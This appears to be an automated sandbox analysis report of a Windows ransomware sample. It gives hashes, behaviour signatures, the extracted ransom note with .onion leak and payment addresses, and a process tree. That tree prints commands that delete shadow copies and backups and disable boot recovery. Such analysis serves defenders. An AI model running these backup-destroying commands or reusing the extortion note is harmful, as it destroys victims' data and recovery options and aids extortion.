Overview

overview

10

Static

static

3

6166c0fe1e...49.exe

windows7-x64

10

6166c0fe1e...49.exe

windows10-2004-x64

10

Resubmissions

29/12/2023, 12:09

231229-pbfk1sgha8 10

29/12/2023, 12:07

231229-pahnzsgha4 10

Analysis

  • max time kernel
    149s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    29/12/2023, 12:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe

  • Size

    510KB

  • MD5

    13ccbab51e6ab57c89ad99f3f676c7f3

  • SHA1

    673fc190f8fb4f7c921de900cedb2f213982c416

  • SHA256

    6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49

  • SHA512

    7c2226b18cdd7a3e6cea078960292c4a8b1c19d39fe692f97ca8b21c90ee25a126c2a8ca65c49e222ce3d691b0e73645a21102fb12a65db1da7a4c6bd1dfba46

  • SSDEEP

    12288:PVQfoJw+q6puobmO/OSST0qU2bwnq7hPVWc4d5pi:PHZh/dSsE0shP

Score
10/10
evasionransomwaretrojan

Malware Config

Extracted

Path

C:\Users\Admin\HOW_TO_RECOVER_FILES.txt

Ransom Note
> WHAT HAPPEND? Important files on your network have been ENCRYPTED and now have the extension .BEAFHHJCJH. To recover your files, you need to follow the instructions below. > SENSITIVE DATA Sensitive data from your network has been DOWNLOADED. If you DON'T WANT to your sensitive data PUBLISHED on our leak blog, you must act quickly. LEAK BLOG: noescapemsqxvizdxyl7f7rmg5cdjwp33pg2wpmiaaibilb4btwzttad.onion Data includes: - Personal data of employees, resume, DL, SSN. - Complete network map, including credentials for local and remote services. - Private financial information including: customer data, accounts, budgets, annual reports, bank statements. - Production documentation, including: datagrams, diagrams, drawings. - And much more... Sample DOWNLOADED FILES are available in your user panel. > CAUTION DO NOT MODIFY ENCRYPTED FILES BY YOURSELF. DO NOT USE THIRD PARTY SOFTWARE TO RESTORE YOUR DATA. YOU MAY DAMAGE YOUR FILES, THIS WILL RESULT IN PERMANENT DATA LOSS. > WHAT SHOULD I DO NEXT? You need to contact us: 1. Download and install TOR browser: https://www.torproject.org/ 2. Go to your user panel: bwjbbpbcihglahwxxusmyy2nxqdc4oqy4rvyhayn4dxhqzji4qi7taid.onion/9aa2579b-2563-4b08-a614-d4f04bdf60a1-uB5wmqiXqjhZ If you have difficulties with authorization in the client panel, you can use the contact form in the "LEAKS BLOG" to contact us
URLs

http://noescapemsqxvizdxyl7f7rmg5cdjwp33pg2wpmiaaibilb4btwzttad.onion

http://bwjbbpbcihglahwxxusmyy2nxqdc4oqy4rvyhayn4dxhqzji4qi7taid.onion/9aa2579b-2563-4b08-a614-d4f04bdf60a1-uB5wmqiXqjhZ

Signatures

  • UAC bypass 3 TTPs 2 IoCs
    evasiontrojan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Renames multiple (145) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Executes dropped EXE 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe
    "C:\Users\Admin\AppData\Local\Temp\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2520
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wmic SHADOWCOPY DELETE /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic SHADOWCOPY DELETE /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2676
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      2⤵
        PID:2912
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
        2⤵
          PID:2388
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -deleteOldest
          2⤵
            PID:2716
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -keepVersions:0
            2⤵
              PID:552
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\SysWOW64\cmd /c vssadmin Delete Shadows /All /Quiet
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2264
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin Delete Shadows /All /Quiet
                3⤵
                • Interacts with shadow copies
                PID:1824
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\SysWOW64\cmd /c bcdedit /set {default} recoveryenabled No
              2⤵
                PID:2004
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\SysWOW64\cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                  PID:1512
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\SysWOW64\cmd /c wmic SHADOWCOPY DELETE /nointeractive
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:680
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    wmic SHADOWCOPY DELETE /nointeractive
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2592
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                  2⤵
                    PID:2904
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
                    2⤵
                      PID:2284
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -deleteOldest
                      2⤵
                        PID:2688
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -keepVersions:0
                        2⤵
                          PID:780
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\SysWOW64\cmd /c vssadmin Delete Shadows /All /Quiet
                          2⤵
                            PID:1636
                            • C:\Windows\SysWOW64\vssadmin.exe
                              vssadmin Delete Shadows /All /Quiet
                              3⤵
                              • Interacts with shadow copies
                              PID:1680
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd /c bcdedit /set {default} recoveryenabled No
                            2⤵
                              PID:1768
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\SysWOW64\cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                              2⤵
                                PID:1724
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\SysWOW64\cmd /c wmic SHADOWCOPY DELETE /nointeractive
                                2⤵
                                  PID:2308
                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                    wmic SHADOWCOPY DELETE /nointeractive
                                    3⤵
                                      PID:2072
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                                    2⤵
                                      PID:2136
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\SysWOW64\cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
                                      2⤵
                                        PID:1504
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -deleteOldest
                                        2⤵
                                          PID:2484
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\SysWOW64\cmd /c wbadmin DELETE BACKUP -keepVersions:0
                                          2⤵
                                            PID:1004
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\SysWOW64\cmd /c vssadmin Delete Shadows /All /Quiet
                                            2⤵
                                              PID:2512
                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                vssadmin Delete Shadows /All /Quiet
                                                3⤵
                                                • Interacts with shadow copies
                                                PID:652
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\SysWOW64\cmd /c bcdedit /set {default} recoveryenabled No
                                              2⤵
                                                PID:452
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\SysWOW64\cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                2⤵
                                                  PID:1064
                                              • C:\Windows\system32\vssvc.exe
                                                C:\Windows\system32\vssvc.exe
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2080
                                              • C:\Windows\system32\taskeng.exe
                                                taskeng.exe {041A5DBC-69AD-4339-BF7A-0E5FBCBA54FC} S-1-5-21-3601492379-692465709-652514833-1000:CALKHSYM\Admin:Interactive:[1]
                                                1⤵
                                                  PID:2304
                                                  • C:\Users\Admin\AppData\Roaming\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe
                                                    C:\Users\Admin\AppData\Roaming\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1636
                                                • C:\Windows\explorer.exe
                                                  "C:\Windows\explorer.exe"
                                                  1⤵
                                                    PID:1344

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Roaming\6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49.exe
                                                    Filesize

                                                    510KB

                                                    MD5

                                                    13ccbab51e6ab57c89ad99f3f676c7f3

                                                    SHA1

                                                    673fc190f8fb4f7c921de900cedb2f213982c416

                                                    SHA256

                                                    6166c0fe1eb887fa4d0719c4cb4fb5d55dd249fab11ba6fb9a3114a5964b1d49

                                                    SHA512

                                                    7c2226b18cdd7a3e6cea078960292c4a8b1c19d39fe692f97ca8b21c90ee25a126c2a8ca65c49e222ce3d691b0e73645a21102fb12a65db1da7a4c6bd1dfba46

                                                    Download Submit

                                                  • C:\Users\Admin\HOW_TO_RECOVER_FILES.txt
                                                    Filesize

                                                    1KB

                                                    MD5

                                                    f8a0490814225ac6ba2ec064c0e31056

                                                    SHA1

                                                    90fdd0ab61fe6edfb855a1a26582c26e341a8df6

                                                    SHA256

                                                    be089a5f36c6b3f87d126eff28913d939a0d32b8deed9a27e5a627b75cdb807c

                                                    SHA512

                                                    0b4496dd30775a39d3b8de0fb975aaffa3ea9997e63b70610c4c5dc85116dbc3f7c6fa2e918c02fa383017c6b9841061ff60585378565316c66ede7a912ea241

                                                    Download Submit